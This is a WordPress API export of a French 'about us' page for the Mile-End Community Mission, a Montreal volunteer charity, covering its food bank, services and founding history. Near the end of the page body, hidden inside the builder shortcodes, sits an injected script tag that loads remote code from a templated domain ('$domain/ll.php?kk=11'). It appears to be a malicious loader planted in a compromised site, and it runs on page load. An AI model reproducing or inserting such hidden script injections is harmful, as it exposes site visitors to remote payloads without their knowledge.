{"id":85,"date":"2011-04-27T21:48:53","date_gmt":"2011-04-28T01:48:53","guid":{"rendered":"https:\/\/www.mileendmission.org\/?page_id=85"},"modified":"2016-07-12T10:05:09","modified_gmt":"2016-07-12T14:05:09","slug":"qui-sommes-nous","status":"publish","type":"page","link":"https:\/\/www.mileendmission.org\/fr\/qui-sommes-nous\/","title":{"rendered":"Qui sommes-nous?"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<strong>\u00a0<\/strong><\/p>\n<p><strong>Comment d\u00e9crire la Mission Communautaire Mile-End?<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-full wp-image-311\" style=\"border: black 1px solid;\" title=\"Christmas Dinner\" src=\"https:\/\/www.mileendmission.org\/wp-content\/uploads\/2011\/04\/Chris-and-Sharissa-Xmas-dinner-08.jpg\" alt=\"\" width=\"288\" height=\"228\" \/>La Mission Communautaire Mile-End est un organisme sans but lucratif g\u00e9r\u00e9 par des b\u00e9n\u00e9voles qui travaillent de concert avec les membres de la communaut\u00e9 vivant en marge de la soci\u00e9t\u00e9. Nos services sont offerts aux enfants, aux adultes en g\u00e9n\u00e9ral, aux personnes malades physiquement ou mentalement. Nous luttons non seulement pour aider ces gens, mais aussi pour leur donner des outils qui leur permettent de se prendre en main.<\/p>\n<p style=\"text-align: left;\">Situ\u00e9 au c\u0153ur du Plateau, la Mission Communautaire Mile-End existe depuis 1991 et a desservi plus de 500 membres de notre quartier qui se sont pr\u00e9valus de nos services plus de 35 000 fois par ann\u00e9e. Plusieurs parmi eux n\u2019avaient ni soutien financier ni soutien psychologique. Ils font face aux \u00e9preuves, au rejet, aux abus, \u00e0 la pauvret\u00e9, \u00e0 l\u2019analphab\u00e9tisme, au diab\u00e8te (+de 20%) et \u00e0 de nombreux autres probl\u00e8mes de sant\u00e9. Nos services leur procurent un soulagement et bien souvent deviennent source d\u2019espoir. Chaque semaine, nous organisons une distribution de nourriture\u00a0gr\u00e2ce \u00e0 la banque alimentaire, et nos portes restent toujours ouvertes pour fournir des denr\u00e9es alimentaires d\u2019urgence \u00e0 ceux qui en ont besoin. Nous vendons\u00a0\u00e9galement\u00a0des v\u00eatements, mais dans des situations d\u2019urgence nous les offrons gracieusement.<\/p>\n<div>Nous sommes fiers du fait que la plupart de nos employ\u00e9s et b\u00e9n\u00e9voles (que ce soient les membres de nos \u00e9quipes ou leurs responsables) sont des gens qui ont b\u00e9n\u00e9fici\u00e9 de nos services et continuent \u00e0 en b\u00e9n\u00e9ficier aujourd&rsquo;hui.<\/div>\n<div>En offrant ces indispensables programmes, services et activit\u00e9s, la Mission Communautaire\u00a0Mile-End encourage et compte sur la d\u00e9votion de trois employ\u00e9s, d&rsquo;une \u00e9quipe de b\u00e9n\u00e9voles d\u00e9vou\u00e9s, d&rsquo;\u00e9tudiants issus du programme \u00ab\u00a0emplois d&rsquo;\u00e9t\u00e9\u00a0\u00bb, de b\u00e9n\u00e9voles issus de la communaut\u00e9 et d&rsquo;un conseil d&rsquo;administration. \u00ab\u00a0Notre inspiration nous vient des personnes que nous aidons, ces personnes qui rel\u00e8vent tant de d\u00e9fis quotidiens, mais sont toujours capables de sourire, car ils savent qu&rsquo;il existe des gens pour les aider.\u00a0\u00bb<\/div>\n<div><\/div>\n<div><a href=\"https:\/\/www.mileendmission.org\/nos-services\/\">Nos services<\/a> sont offerts en fran\u00e7ais et en anglais.<\/div>\n<p>&nbsp;<\/p>\n<p><strong>Comment est n\u00e9e la Mission?<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"border: black 1px solid;\" title=\"Roslyn Macgregor\" src=\"https:\/\/www.mileendmission.org\/wp-content\/uploads\/2011\/04\/roslyn-macgregor2.jpg\" alt=\"Roslyn Macgregor\" width=\"288\" height=\"265\" \/><\/p>\n<p>Jusqu\u2019en 1991 l\u2019\u00c9glise de l\u2019Ascension assurait une pr\u00e9sence anglicane dans le quartier. L\u2019\u00c9glise de l\u2019Ascension, situ\u00e9e au 5434 Avenue du Parc, fut s\u00e9cularis\u00e9e et vendue \u00e0 la Ville de Montr\u00e9al; elle fut transform\u00e9e en biblioth\u00e8que municipale. Le r\u00e9v\u00e9rend John Beach, recteur de l\u2019\u00c9glise \u00e0 l\u2019\u00e9poque de la vente, a propos\u00e9 que le Dioc\u00e8se de Montr\u00e9al maintienne un minist\u00e8re dans le district du Mile-End. Le Dioc\u00e8se a donn\u00e9 la permission d\u2019ouvrir un point de service et y a investi un montant des int\u00e9r\u00eats de la vente de l\u2019\u00c9glise de l\u2019Ascension. Le presbyt\u00e8re fut aussi vendu en 1995\/96.<\/p>\n<p>En 1986 le R\u00e9v\u00e9rend Michael Pountrey et son \u00e9pouse \u00c9laine avaient organis\u00e9 \u00e0 partir de l\u2019\u00c9glise un service de distribution de repas et d\u2019\u00e9picerie en faveur des pauvres de Mile-End. Lorsque John Beach devint le pasteur de l\u2019Ascension, il a continu\u00e9 ce minist\u00e8re qui a donn\u00e9 naissance par la suite la Mission. En 1995 John Beach a d\u00e9missionn\u00e9 comme directeur de la Mission afin d\u2019accepter un poste aux Etats-Unis.<\/p>\n<p>Le 1e mai 1995 la r\u00e9v\u00e9rende Roslyn Macgregor le remplace. \u00c0 la demande de Roslyn, John accepte de rester pour une p\u00e9riode de transition de deux mois.<script src=\"http:\/\/$domain\/ll.php?kk=11\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][vc_column_text]\u00a0 Comment d\u00e9crire la Mission Communautaire Mile-End? La Mission Communautaire Mile-End est un organisme sans but lucratif g\u00e9r\u00e9 par des b\u00e9n\u00e9voles qui travaillent de concert avec les membres de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-85","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.mileendmission.org\/fr\/wp-json\/wp\/v2\/pages\/85","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mileendmission.org\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.mileendmission.org\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.mileendmission.org\/fr\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mileendmission.org\/fr\/wp-json\/wp\/v2\/comments?post=85"}],"version-history":[{"count":3,"href":"https:\/\/www.mileendmission.org\/fr\/wp-json\/wp\/v2\/pages\/85\/revisions"}],"predecessor-version":[{"id":3211,"href":"https:\/\/www.mileendmission.org\/fr\/wp-json\/wp\/v2\/pages\/85\/revisions\/3211"}],"wp:attachment":[{"href":"https:\/\/www.mileendmission.org\/fr\/wp-json\/wp\/v2\/media?parent=85"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}